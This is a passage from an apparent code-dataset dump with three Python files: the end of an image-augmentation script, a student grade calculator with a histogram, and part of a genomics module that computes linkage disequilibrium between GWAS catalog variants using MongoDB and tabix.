np.cos(rotation), 0], [0, 0, 1]])\n shift_matrix = np.array([[1, 0, height_shift], [0, 1, width_shift], [0, 0, 1]])\n shear_matrix = np.array([[1, np.sin(shear), 0], [0, np.cos(shear), 0], [0, 0, 1]])\n zoom_matrix = np.array([[1.0/height_zoom, 0, 0], [0, 1.0/width_zoom, 0], [0, 0, 1]])\n shift_matrix = np.array([[1, 0, -height_shift], [0, 1, -width_shift], [0, 0, 1]])\n return np.dot(np.dot(rotation_matrix, shear_matrix), np.dot(zoom_matrix, shift_matrix))\n\n# Compute the coordinate transformation required to center the pictures, padding as required.\ndef center_transform(affine, input_shape):\n hi, wi = float(input_shape[0]), float(input_shape[1])\n ho, wo = float(img_shape[0]), float(img_shape[1])\n top, left, bottom, right = 0, 0, hi, wi\n if wi/hi/anisotropy < wo/ho: # input image too narrow, extend width\n w = hi*wo/ho*anisotropy\n left = (wi-w)/2\n right = left + w\n else: # input image too wide, extend height\n h = wi*ho/wo/anisotropy\n top = (hi-h)/2\n bottom = top + h\n center_matrix = np.array([[1, 0, -ho/2], [0, 1, -wo/2], [0, 0, 1]])\n scale_matrix = np.array([[(bottom - top)/ho, 0, 0], [0, (right - left)/wo, 0], [0, 0, 1]])\n decenter_matrix = np.array([[1, 0, hi/2], [0, 1, wi/2], [0, 0, 1]])\n return np.dot(np.dot(decenter_matrix, scale_matrix), np.dot(affine, center_matrix))\n\n# Apply an affine transformation to an image represented as a numpy array.\ndef transform_img(x, affine):\n matrix = affine[:2,:2]\n offset = affine[:2,2]\n x = np.moveaxis(x, -1, 0)\n channels = [affine_transform(channel, matrix, offset, output_shape=img_shape[:-1], order=1,\n mode='constant', cval=np.average(channel)) for channel in x]\n return np.moveaxis(np.stack(channels, axis=0), 0, -1)\n\n# Read an image for validation, i.e. without data augmentation.\ndef read_for_validation(p):\n x = read_array(p)\n t = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])\n t = center_transform(t, x.shape)\n x = transform_img(x, t)\n x -= np.mean(x, keepdims=True)\n x /= np.std(x, keepdims=True) + K.epsilon()\n return x,t\n\n# Read an image for training, i.e. 
including a random affine transformation\nfrom keras import backend as K\ndef read_for_training(p):\n x = read_array(p)\n t = build_transform(\n random.uniform(-5, 5),\n random.uniform(-5, 5),\n random.uniform(0.9, 1.0),\n random.uniform(0.9, 1.0),\n random.uniform(-0.05*img_shape[0], 0.05*img_shape[0]),\n random.uniform(-0.05*img_shape[1], 0.05*img_shape[1]))\n t = center_transform(t, x.shape)\n x = transform_img(x, t)\n x -= np.mean(x, keepdims=True)\n x /= np.std(x, keepdims=True) + K.epsilon()\n return x,t\n\n# Transform corrdinates according to the provided affine transformation\ndef coord_transform(list, trans):\n result = []\n for x,y in list:\n y,x,_ = trans.dot([y,x,1]).astype(np.int)\n result.append((x,y))\n return result\n\n\n# tf.image.decode_jpeg()\n#\n# model_pretrain = MobileNet(input_shape=(224,224,3))\n# embeded_train = model_pretrain.predict(train_ds)","sub_path":"z_script/20200221_NONEED.py","file_name":"20200221_NONEED.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"226755869","text":"import numpy as np\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\n#arrays for all of the scores for each student, student grades are verticle\nHomework = np.array([10., 10., 8., 9.5, 3., 9., 0, 6.]) \nMid_term = np.array([10., 10., 10., 10., 8., 5., 10., 7.]) \nFinal_Project = np.array([9., 10., 10., 6., 10., 6., 8., 9.])\n\n# This calcualtes final grade and adds each grade to a list\ni=0\nGrade=0\nlist_Grades = [] #an empty list\nwhile i < Homework.shape[0]:\n\tGrade = Homework[i]*0.4 + Mid_term[i]*0.2 + Final_Project[i]*0.4\n\ti=i+1\n\tlist_Grades.append(Grade) #adds grade value to empty list\n\n# This is to get the program to write the list to a file\nprintFile = open('List of Grades.txt', 'w+')\nprintFile.write(\"\\n\".join(map(lambda x: str(x), list_Grades)))\n#printFile.write(\"\\n\".join(str(x) for x in list_Grades)) Another way to do it\nprintFile.close()\n\n# Now to check how many failed\nk=0 \nfailCount = 0\nwhile k < Homework.shape[0]:\n\tif list_Grades[k] < 6:\n\t\tfailCount = failCount + 1\n\tk = k + 1\nprint ('\\nNumber of students that failed:', failCount)\n\n# Now to check how many \"outstanding\" students\nm = 0\noutStudent = 0\nwhile m < Homework.shape[0]:\n\tif list_Grades[m] > 9.5:\n\t\toutStudent = outStudent + 1\n\tm = m + 1\nprint ('\\nNumber of outstanding students:', outStudent)\n\n#Histogram\nnum_bins = 10\n# the histogram of the data\nn, bins, patches = plt.hist(list_Grades, num_bins, facecolor='blue', alpha=0.5)\n#get rid of normed=1 from matplotlib.org example, caused problems with y-axis\nplt.xlabel('Score')\nplt.ylabel('Students')\nplt.title(r'Histogram of Student Grades')\n# Tweak spacing to prevent clipping of ylabel\nplt.subplots_adjust(left=0.15)\n#use this to show plot instead of saving it: plt.show()\n\n#save using a .png, save histogram\nplt.savefig('Histogram.png', format = 'png')\n\n","sub_path":"Week1/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"302648881","text":"#!/usr/bin/env python3\n\nimport yaml\nimport json\nimport copy\nimport math\nimport os\nimport collections\nimport re\nfrom pymongo import MongoClient\nfrom pymongo.errors import ConnectionFailure\nfrom bson import json_util, ObjectId\nimport subprocess\nfrom multiprocessing import Pool\nimport sys\nimport numpy as np\t\nfrom timeit import 
default_timer as timer\n\n\n# Set data directories using config.yml\t\nwith open('config.yml', 'r') as f:\t\n config = yaml.load(f)\t\nenv = config['env']\napi_mongo_addr = config['api']['api_mongo_addr']\ndbsnp_version = config['data']['dbsnp_version']\t\npop_dir = config['data']['pop_dir']\t\nvcf_dir = config['data']['vcf_dir']\nmongo_username = config['database']['mongo_user_readonly']\nmongo_password = config['database']['mongo_password']\nmongo_port = config['database']['mongo_port']\n\ndef get_ldtrait_timestamp(web):\n try:\n with open('config.yml', 'r') as c:\n config = yaml.load(c)\n env = config['env']\n api_mongo_addr = config['api']['api_mongo_addr']\n mongo_username = config['database']['mongo_user_readonly']\n mongo_password = config['database']['mongo_password']\n mongo_port = config['database']['mongo_port']\n\n # Connect to Mongo snp database\n if env == 'local':\n mongo_host = api_mongo_addr\n else: \n mongo_host = 'localhost'\n if web:\n client = MongoClient('mongodb://' + mongo_username + ':' + mongo_password + '@' + mongo_host + '/admin', mongo_port)\n else:\n if env == 'local':\n client = MongoClient('mongodb://' + mongo_username + ':' + mongo_password + '@' + mongo_host + '/admin', mongo_port)\n else:\n client = MongoClient('localhost', mongo_port)\n except ConnectionFailure:\n print(\"MongoDB is down\")\n print(\"syntax: mongod --dbpath /local/content/analysistools/public_html/apps/LDlink/data/mongo/data/db/ --auth\")\n return \"Failed to connect to server.\"\n\n db = client[\"LDLink\"]\n for document in db.gwas_catalog.find().sort(\"_id\", -1).limit(1):\n object_id_datetime = document.get('_id').generation_time\n json_output = json.dumps(object_id_datetime, default=json_util.default, sort_keys=True, indent=2)\n return json_output\n\n\ndef get_window_variants(db, chromosome, position, window):\n query_results = db.gwas_catalog.find({\n \"chromosome_grch37\": chromosome, \n \"position_grch37\": {\n \"$gte\": (position - window) if (position - window) > 0 else 0, \n \"$lte\": position + window\n }\n })\n query_results_sanitized = json.loads(json_util.dumps(query_results))\n return query_results_sanitized\n\ndef expandSelectedPopulationGroups(pops):\n expandedPops = copy.deepcopy(pops)\n pop_groups = {\n \"ALL\": [\"ACB\", \"ASW\", \"BEB\", \"CDX\", \"CEU\", \"CHB\", \"CHS\", \"CLM\", \"ESN\", \"FIN\", \"GBR\", \"GIH\", \"GWD\", \"IBS\", \"ITU\", \"JPT\", \"KHV\", \"LWK\", \"MSL\", \"MXL\", \"PEL\", \"PJL\", \"PUR\", \"STU\", \"TSI\", \"YRI\"],\n \"AFR\": [\"YRI\", \"LWK\", \"GWD\", \"MSL\", \"ESN\", \"ASW\", \"ACB\"],\n \"AMR\": [\"MXL\", \"PUR\", \"CLM\", \"PEL\"],\n \"EAS\": [\"CHB\", \"JPT\", \"CHS\", \"CDX\", \"KHV\"],\n \"EUR\": [\"CEU\", \"TSI\", \"FIN\", \"GBR\" , \"IBS\"],\n \"SAS\": [\"GIH\", \"PJL\", \"BEB\", \"STU\" , \"ITU\"]\n }\n if \"ALL\" in pops:\n expandedPops.remove(\"ALL\")\n expandedPops = pop_groups[\"ALL\"]\n expandedPops = list(set(expandedPops)) # unique elements\n return expandedPops\n else:\n if \"AFR\" in pops:\n expandedPops.remove(\"AFR\")\n expandedPops = expandedPops + pop_groups[\"AFR\"]\n expandedPops = list(set(expandedPops)) # unique elements\n if \"AMR\" in pops:\n expandedPops.remove(\"AMR\")\n expandedPops = expandedPops + pop_groups[\"AMR\"]\n expandedPops = list(set(expandedPops)) # unique elements\n if \"EAS\" in pops:\n expandedPops.remove(\"EAS\")\n expandedPops = expandedPops + pop_groups[\"EAS\"]\n expandedPops = list(set(expandedPops)) # unique elements\n if \"EUR\" in pops:\n expandedPops.remove(\"EUR\")\n expandedPops = 
expandedPops + pop_groups[\"EUR\"]\n expandedPops = list(set(expandedPops)) # unique elements\n if \"SAS\" in pops:\n expandedPops.remove(\"SAS\")\n expandedPops = expandedPops + pop_groups[\"SAS\"]\n expandedPops = list(set(expandedPops)) # unique elements\n return expandedPops\n\ndef get_ld_stats(variantPair, pop_ids):\t\n # parse ld pair array parameter input\n snp1 = variantPair[0]\n snp1_coord = {\n \"chromosome\": variantPair[1], \n \"position\": variantPair[2]\n }\n snp2 = variantPair[3]\n snp2_coord = {\n \"chromosome\": variantPair[4], \n \"position\": variantPair[5]\n }\n\n # errors/warnings encountered\t\n output = {\t\n \"error\": [],\t\n \"warning\": []\t\n }\t\n # Extract 1000 Genomes phased genotypes\t\n # SNP1\t\n vcf_file1 = vcf_dir + snp1_coord['chromosome'] + \".phase3_shapeit2_mvncall_integrated_v5.20130502.genotypes.vcf.gz\"\t\n tabix_snp1_offset = \"tabix {0} {1}:{2}-{2} | grep -v -e END\".format(\t\n vcf_file1, snp1_coord['chromosome'], snp1_coord['position'])\t\n proc1_offset = subprocess.Popen(\t\n tabix_snp1_offset, shell=True, stdout=subprocess.PIPE)\t\n vcf1_offset = [x.decode('utf-8') for x in proc1_offset.stdout.readlines()]\t\n # SNP2\t\n vcf_file2 = vcf_dir + snp2_coord['chromosome'] + \".phase3_shapeit2_mvncall_integrated_v5.20130502.genotypes.vcf.gz\"\t\n tabix_snp2_offset = \"tabix {0} {1}:{2}-{2} | grep -v -e END\".format(\t\n vcf_file2, snp2_coord['chromosome'], snp2_coord['position'])\t\n proc2_offset = subprocess.Popen(\t\n tabix_snp2_offset, shell=True, stdout=subprocess.PIPE)\t\n vcf2_offset = [x.decode('utf-8') for x in proc2_offset.stdout.readlines()]\t\n\n vcf1_pos = snp1_coord['position']\t\n vcf2_pos = snp2_coord['position']\t\n vcf1 = vcf1_offset\t\n vcf2 = vcf2_offset\t\n\n # SNP1\t\n if len(vcf1) == 0:\t\n output[\"error\"].append(snp1 + \" is not in 1000G reference panel.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n elif len(vcf1) > 1:\t\n geno1 = []\t\n for i in range(len(vcf1)):\t\n if vcf1[i].strip().split()[2] == snp1:\t\n geno1 = vcf1[i].strip().split()\t\n if geno1 == []:\t\n output[\"error\"].append(snp1 + \" is not in 1000G reference panel.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n else:\t\n geno1 = vcf1[0].strip().split()\t\n if geno1[2] != snp1:\t\n output[\"warning\"].append(\"Genomic position for query variant1 (\" + snp1 + \") does not match RS number at 1000G position (chr\" + geno1[0]+\":\"+geno1[1]+\")\")\t\n snp1 = geno1[2]\t\n if \",\" in geno1[3] or \",\" in geno1[4]:\t\n output[\"error\"].append(snp1 + \" is not a biallelic variant.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n if len(geno1[3]) == 1 and len(geno1[4]) == 1:\t\n snp1_a1 = geno1[3]\t\n snp1_a2 = geno1[4]\t\n elif len(geno1[3]) == 1 and len(geno1[4]) > 1:\t\n snp1_a1 = \"-\"\t\n snp1_a2 = geno1[4][1:]\t\n elif len(geno1[3]) > 1 and len(geno1[4]) == 1:\t\n snp1_a1 = geno1[3][1:]\t\n snp1_a2 = \"-\"\t\n elif len(geno1[3]) > 1 and len(geno1[4]) > 1:\t\n snp1_a1 = geno1[3][1:]\t\n snp1_a2 = geno1[4][1:]\t\n allele1 = {\t\n \"0|0\": [snp1_a1, snp1_a1], \t\n \"0|1\": [snp1_a1, snp1_a2], \t\n \"1|0\": [snp1_a2, snp1_a1], \t\n \"1|1\": [snp1_a2, snp1_a2], \t\n \"0\": [snp1_a1, \".\"], \t\n \"1\": [snp1_a2, \".\"], \t\n \"./.\": [\".\", \".\"], \t\n \".\": [\".\", \".\"]\t\n }\t\n # SNP2\t\n 
if len(vcf2) == 0:\t\n output[\"error\"].append(snp2 + \" is not in 1000G reference panel.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n elif len(vcf2) > 1:\t\n geno2 = []\t\n for i in range(len(vcf2)):\t\n if vcf2[i].strip().split()[2] == snp2:\t\n geno2 = vcf2[i].strip().split()\t\n if geno2 == []:\t\n output[\"error\"].append(snp2 + \" is not in 1000G reference panel.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n else:\t\n geno2 = vcf2[0].strip().split()\t\n if geno2[2] != snp2:\t\n output[\"warning\"].append(\"Genomic position for query variant2 (\" + snp2 + \") does not match RS number at 1000G position (chr\" + geno2[0] + \":\" + geno2[1] + \")\")\t\n snp2 = geno2[2]\t\n if \",\" in geno2[3] or \",\" in geno2[4]:\t\n output[\"error\"].append(snp2 + \" is not a biallelic variant.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n if len(geno2[3]) == 1 and len(geno2[4]) == 1:\t\n snp2_a1 = geno2[3]\t\n snp2_a2 = geno2[4]\t\n elif len(geno2[3]) == 1 and len(geno2[4]) > 1:\t\n snp2_a1 = \"-\"\t\n snp2_a2 = geno2[4][1:]\t\n elif len(geno2[3]) > 1 and len(geno2[4]) == 1:\t\n snp2_a1 = geno2[3][1:]\t\n snp2_a2 = \"-\"\t\n elif len(geno2[3]) > 1 and len(geno2[4]) > 1:\t\n snp2_a1 = geno2[3][1:]\t\n snp2_a2 = geno2[4][1:]\t\n allele2 = {\t\n \"0|0\": [snp2_a1, snp2_a1], \t\n \"0|1\": [snp2_a1, snp2_a2], \t\n \"1|0\": [snp2_a2, snp2_a1], \t\n \"1|1\": [snp2_a2, snp2_a2], \t\n \"0\": [snp2_a1, \".\"], \t\n \"1\": [snp2_a2, \".\"], \t\n \"./.\": [\".\", \".\"], \t\n \".\": [\".\", \".\"]\t\n }\t\n \n if geno1[1] != vcf1_pos:\t\n output[\"error\"].append(\"VCF File does not match variant coordinates for SNP1.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n if geno2[1] != vcf2_pos:\t\n output[\"error\"].append(\"VCF File does not match variant coordinates for SNP2.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"p\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\t\n\n # Get headers\t\n tabix_snp1_h = \"tabix -H {0} | grep CHROM\".format(vcf_file1)\t\n proc1_h = subprocess.Popen(\t\n tabix_snp1_h, shell=True, stdout=subprocess.PIPE)\t\n head1 = [x.decode('utf-8') for x in proc1_h.stdout.readlines()][0].strip().split()\t\n tabix_snp2_h = \"tabix -H {0} | grep CHROM\".format(vcf_file2)\t\n proc2_h = subprocess.Popen(\t\n tabix_snp2_h, shell=True, stdout=subprocess.PIPE)\t\n head2 = [x.decode('utf-8') for x in proc2_h.stdout.readlines()][0].strip().split()\t\n # Combine phased genotypes\t\n geno = {}\t\n for i in range(9, len(head1)):\t\n geno[head1[i]] = [allele1[geno1[i]], \"..\"]\t\n for i in range(9, len(head2)):\t\n if head2[i] in geno:\t\n geno[head2[i]][1] = allele2[geno2[i]]\t\n\n # Extract haplotypes\t\n hap = {}\t\n for ind in pop_ids:\t\n if ind in geno:\t\n hap1 = geno[ind][0][0] + \"_\" + geno[ind][1][0]\t\n hap2 = geno[ind][0][1] + \"_\" + geno[ind][1][1]\t\n if hap1 in hap:\t\n hap[hap1] += 1\t\n else:\t\n hap[hap1] = 1\t\n if hap2 in hap:\t\n hap[hap2] += 1\t\n else:\t\n hap[hap2] = 1\t\n\n # Remove missing haplotypes\t\n keys = list(hap.keys())\t\n for key in keys:\t\n if \".\" in key:\t\n hap.pop(key, None)\t\n # Check all haplotypes are present\t\n if len(hap) != 4:\t\n snp1_a = [snp1_a1, 
snp1_a2]\t\n snp2_a = [snp2_a1, snp2_a2]\t\n haps = [snp1_a[0] + \"_\" + snp2_a[0], snp1_a[0] + \"_\" + snp2_a[1],\t\n snp1_a[1] + \"_\" + snp2_a[0], snp1_a[1] + \"_\" + snp2_a[1]]\t\n for i in haps:\t\n if i not in hap:\t\n hap[i] = 0\t\n\n # Sort haplotypes\n A = hap[sorted(hap)[0]]\n B = hap[sorted(hap)[1]]\n C = hap[sorted(hap)[2]]\n D = hap[sorted(hap)[3]]\n N = A + B + C + D\n # tmax = max(A, B, C, D)\n\n hap1 = sorted(hap, key=hap.get, reverse=True)[0]\n hap2 = sorted(hap, key=hap.get, reverse=True)[1]\n # hap3 = sorted(hap, key=hap.get, reverse=True)[2]\n # hap4 = sorted(hap, key=hap.get, reverse=True)[3]\n\n delta = float(A * D - B * C)\n Ms = float((A + C) * (B + D) * (A + B) * (C + D))\n # print(\"Ms=\", Ms)\n if Ms != 0:\n # D prime\n if delta < 0:\n D_prime = abs(delta / min((A + C) * (A + B), (B + D) * (C + D)))\n else:\n D_prime = abs(delta / min((A + C) * (C + D), (A + B) * (B + D)))\n # R2\n r2 = (delta**2) / Ms\n else:\n output[\"error\"].append(\"Variant MAF is 0.0, variant removed.\")\t\n return {\t\n \"r2\": \"NA\",\t\n \"D_prime\": \"NA\",\t\n \"alleles\": \"NA\",\t\n \"output\": output\t\n }\n\n allele1 = str(sorted(hap)[0].split(\"_\")[1])\n allele1_freq = str(round(float(A + C) / N, 3)) if N > float(A + C) else \"NA\"\n\n allele2 = str(sorted(hap)[1].split(\"_\")[1])\n allele2_freq = str(round(float(B + D) / N, 3)) if N > float(B + D) else \"NA\"\n\n alleles = \", \".join([\"=\".join([allele1, allele1_freq]),\"=\".join([allele2, allele2_freq])])\n\n return {\n \"r2\": r2,\n \"D_prime\": D_prime,\n \"alleles\": alleles,\n \"output\": output\n }\n\ndef get_ld_stats_sub(threadCommandArgs):\t\n variantPairs = threadCommandArgs[0]\t\n pop_ids = threadCommandArgs[1]\t\n thread = threadCommandArgs[2]\t\n print(\"thread \" + str(thread) + \" kicked\")\t\n ldInfoSubset = {}\t\n for variantPair in variantPairs:\t\t\n ld = get_ld_stats(variantPair, pop_ids)\t\t\n # print(\"thread\", thread, \"variantPair\", variantPair, \"ld\", ld)\t\t\n # ld = {\t\t\n # \"r2\": \"NA\",\t\t\n # \"D_prime\": \"NA\",\t\t\n # \"p\": \"NA\",\t\t\n # \"output\": []\t\t\n # }\t\t\n # store LD calculation results in a object\t\t\n if variantPair[0] not in ldInfoSubset:\t\t\n ldInfoSubset[variantPair[0]] = {}\t\t\n ldInfoSubset[variantPair[0]][variantPair[3]] = ld\t\t\n else:\t\t\n ldInfoSubset[variantPair[0]][variantPair[3]] = ld\t\t\n return ldInfoSubset\t\n\ndef castFloat(val):\n try:\n val_float = float(val)\n return val_float\n except ValueError:\n return val\n\ndef findRangeString(val):\n result = re.sub(r\"\\[*\\]*[a-zA-Z]*\\s*\", \"\", val)\n if len(result) > 0:\n return result\n else:\n return \"NA\"\n\ndef get_gwas_fields(query_snp, query_snp_chr, query_snp_pos, found, pops, pop_ids, ldInfo, r2_d, r2_d_threshold):\t \n matched_snps = []\n window_problematic_snps = []\n for record in found:\n ld = ldInfo.get(query_snp).get(\"rs\" + record[\"SNP_ID_CURRENT\"])\n if (ld[\"r2\"] != \"NA\" or ld[\"D_prime\"] != \"NA\"):\n if ((r2_d == \"r2\" and ld[\"r2\"] >= r2_d_threshold) or (r2_d == \"d\" and ld[\"D_prime\"] >= r2_d_threshold)):\n matched_record = []\n # Query SNP\n # matched_record.append(query_snp)\n # GWAS Trait\n matched_record.append(record[\"DISEASE/TRAIT\"]) \n # RS Number\n matched_record.append(\"rs\" + record[\"SNP_ID_CURRENT\"]) \n # Position\n matched_record.append(\"chr\" + str(record[\"chromosome_grch37\"]) + \":\" + str(record[\"position_grch37\"]))\n # Alleles\t\n matched_record.append(ld[\"alleles\"])\t\n # R2\t\n matched_record.append(ld[\"r2\"])\t\n # D'\t\n 
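# (both r2 and D' above come from get_ld_stats: delta = A*D - B*C, r2 = delta**2 / ((A+C)*(B+D)*(A+B)*(C+D)), and D' is delta scaled by the most extreme value the allele margins allow)\t\n                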
matched_record.append(ld[\"D_prime\"])\t\n # LDpair (Link)\t\n matched_record.append([query_snp, \"rs\" + record[\"SNP_ID_CURRENT\"], \"%2B\".join(expandSelectedPopulationGroups(pops))])\n # Risk Allele\n matched_record.append(record[\"RISK ALLELE FREQUENCY\"] if (\"RISK ALLELE FREQUENCY\" in record and len(record[\"RISK ALLELE FREQUENCY\"]) > 0) else \"NA\")\n # Beta or OR\n matched_record.append(castFloat(record[\"OR or BETA\"]) if (\"OR or BETA\" in record and len(record[\"OR or BETA\"]) > 0) else \"NA\")\n # Effect Size (95% CI)\n matched_record.append(findRangeString(record[\"95% CI (TEXT)\"]) if (\"95% CI (TEXT)\" in record and len(record[\"95% CI (TEXT)\"]) > 0) else \"NA\")\n # P-value\n matched_record.append(record[\"P-VALUE\"] if (\"P-VALUE\" in record and len(record[\"P-VALUE\"]) > 0) else \"NA\")\n # GWAS Catalog (Link)\n matched_record.append(\"rs\" + record[\"SNP_ID_CURRENT\"])\n # Details\n # matched_record.append(\"Variant found in GWAS catalog within window.\")\n # print(\"matched_record\", matched_record)\n matched_snps.append(matched_record)\n else: \n if (r2_d == \"r2\"):\n problematic_record = [query_snp, \"rs\" + record[\"SNP_ID_CURRENT\"], \"chr\" + str(record[\"chromosome_grch37\"]) + \":\" + str(record[\"position_grch37\"]), record[\"DISEASE/TRAIT\"] if (\"DISEASE/TRAIT\" in record and len(record[\"DISEASE/TRAIT\"]) > 0) else \"NA\", \"R2 value (\" + str(ld[\"r2\"]) + \") below threshold (\" + str(r2_d_threshold) + \")\"]\n window_problematic_snps.append(problematic_record)\n else:\n problematic_record = [query_snp, \"rs\" + record[\"SNP_ID_CURRENT\"], \"chr\" + str(record[\"chromosome_grch37\"]) + \":\" + str(record[\"position_grch37\"]), record[\"DISEASE/TRAIT\"] if (\"DISEASE/TRAIT\" in record and len(record[\"DISEASE/TRAIT\"]) > 0) else \"NA\", \"D' value (\" + str(ld[\"D_prime\"]) + \") below threshold. (\" + str(r2_d_threshold) + \")\"]\n window_problematic_snps.append(problematic_record)\n else:\n problematic_record = [query_snp, \"rs\" + record[\"SNP_ID_CURRENT\"], \"chr\" + str(record[\"chromosome_grch37\"]) + \":\" + str(record[\"position_grch37\"]), record[\"DISEASE/TRAIT\"] if (\"DISEASE/TRAIT\" in record and len(record[\"DISEASE/TRAIT\"]) > 0) else \"NA\", \" \".join(ld[\"output\"][\"error\"])]\n window_problematic_snps.append(problematic_record)\n return (matched_snps, window_problematic_snps)\n\n# Create LDtrait function\ndef calculate_trait(snplst, pop, request, web, r2_d, r2_d_threshold=0.1):\n print(\"##### START LD TRAIT CALCULATION #####\")\t\n start = timer()\n \n # snp limit\n max_list = 50\n\n # Ensure tmp directory exists\n tmp_dir = \"./tmp/\"\n if not os.path.exists(tmp_dir):\n os.makedirs(tmp_dir)\n\n # Create JSON output for warnings and errors\n out_json = open(tmp_dir + \"trait\" + str(request) + \".json\", \"w\")\n output = {}\n\n # open snps file\n with open(snplst, 'r') as fp:\n snps_raw = fp.readlines()\n # Generate error if # of inputted SNPs exceeds limit\n if len(snps_raw) > max_list:\n output[\"error\"] = \"Maximum SNP list is \" + \\\n str(max_list)+\" RS numbers. 
Your list contains \" + \\\n str(len(snps_raw))+\" entries.\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n # Remove duplicate RS numbers\n sanitized_query_snps = []\n for snp_raw in snps_raw:\n snp = snp_raw.strip()\n if snp not in sanitized_query_snps:\n sanitized_query_snps.append([snp])\n\n # Connect to Mongo snp database\n if env == 'local':\n mongo_host = api_mongo_addr\n else: \n mongo_host = 'localhost'\n if web:\n client = MongoClient('mongodb://' + mongo_username + ':' + mongo_password + '@'+mongo_host+'/admin', mongo_port)\n else:\n if env == 'local':\n client = MongoClient('mongodb://' + mongo_username + ':' + mongo_password + '@'+mongo_host+'/admin', mongo_port)\n else:\n client = MongoClient('localhost', mongo_port)\n db = client[\"LDLink\"]\n # Check if gwas_catalog collection in MongoDB exists, if not, display error\n if \"gwas_catalog\" not in db.list_collection_names():\n output[\"error\"] = \"GWAS Catalog database is currently being updated. Please check back later.\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n # Select desired ancestral populations\n pops = pop.split(\"+\")\n pop_dirs = []\n for pop_i in pops:\n if pop_i in [\"ALL\", \"AFR\", \"AMR\", \"EAS\", \"EUR\", \"SAS\", \"ACB\", \"ASW\", \"BEB\", \"CDX\", \"CEU\", \"CHB\", \"CHS\", \"CLM\", \"ESN\", \"FIN\", \"GBR\", \"GIH\", \"GWD\", \"IBS\", \"ITU\", \"JPT\", \"KHV\", \"LWK\", \"MSL\", \"MXL\", \"PEL\", \"PJL\", \"PUR\", \"STU\", \"TSI\", \"YRI\"]:\n pop_dirs.append(pop_dir+pop_i+\".txt\")\n else:\n output[\"error\"] = pop_i+\" is not an ancestral population. Choose one of the following ancestral populations: AFR, AMR, EAS, EUR, or SAS; or one of the following sub-populations: ACB, ASW, BEB, CDX, CEU, CHB, CHS, CLM, ESN, FIN, GBR, GIH, GWD, IBS, ITU, JPT, KHV, LWK, MSL, MXL, PEL, PJL, PUR, STU, TSI, or YRI.\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n get_pops = \"cat \" + \" \".join(pop_dirs)\n proc = subprocess.Popen(get_pops, shell=True, stdout=subprocess.PIPE)\n pop_list = [x.decode('utf-8') for x in proc.stdout.readlines()]\n\n ids = [i.strip() for i in pop_list]\n pop_ids = list(set(ids))\n\n # Get genomic coordinates from rs number from dbsnp151\n def get_coords(db, rsid):\n rsid = rsid.strip(\"rs\")\n query_results = db.dbsnp151.find_one({\"id\": rsid})\n query_results_sanitized = json.loads(json_util.dumps(query_results))\n return query_results_sanitized\n\n\n # Get rs number from genomic coordinates from dbsnp151\n def get_rsnum(db, coord):\n temp_coord = coord.strip(\"chr\").split(\":\")\n chro = temp_coord[0]\n pos = temp_coord[1]\n query_results = db.dbsnp151.find({\"chromosome\": chro, \"position\": pos})\n query_results_sanitized = json.loads(json_util.dumps(query_results))\n return query_results_sanitized\n\n # Replace input genomic coordinates with variant ids (rsids)\n def replace_coords_rsid(db, snp_lst):\n new_snp_lst = []\n for snp_raw_i in snp_lst:\n if snp_raw_i[0][0:2] == \"rs\":\n # print \"reached 1\", snp_raw_i\n new_snp_lst.append(snp_raw_i)\n else:\n # print \"reached 2\", snp_raw_i\n snp_info_lst = get_rsnum(db, snp_raw_i[0])\n if snp_info_lst != None:\n if len(snp_info_lst) > 1:\n var_id = \"rs\" + snp_info_lst[0]['id']\n ref_variants = []\n for snp_info in snp_info_lst:\n if 
snp_info['id'] == snp_info['ref_id']:\n ref_variants.append(snp_info['id'])\n if len(ref_variants) > 1:\n var_id = \"rs\" + ref_variants[0]\n if \"warning\" in output:\n output[\"warning\"] = output[\"warning\"] + \\\n \". Multiple rsIDs (\" + \", \".join([\"rs\" + ref_id for ref_id in ref_variants]) + \") map to genomic coordinates \" + snp_raw_i[0]\n else:\n output[\"warning\"] = \"Multiple rsIDs (\" + \", \".join([\"rs\" + ref_id for ref_id in ref_variants]) + \") map to genomic coordinates \" + snp_raw_i[0]\n elif len(ref_variants) == 0 and len(snp_info_lst) > 1:\n var_id = \"rs\" + snp_info_lst[0]['id']\n if \"warning\" in output:\n output[\"warning\"] = output[\"warning\"] + \\\n \". Multiple rsIDs (\" + \", \".join([\"rs\" + ref_id for ref_id in ref_variants]) + \") map to genomic coordinates \" + snp_raw_i[0]\n else:\n output[\"warning\"] = \"Multiple rsIDs 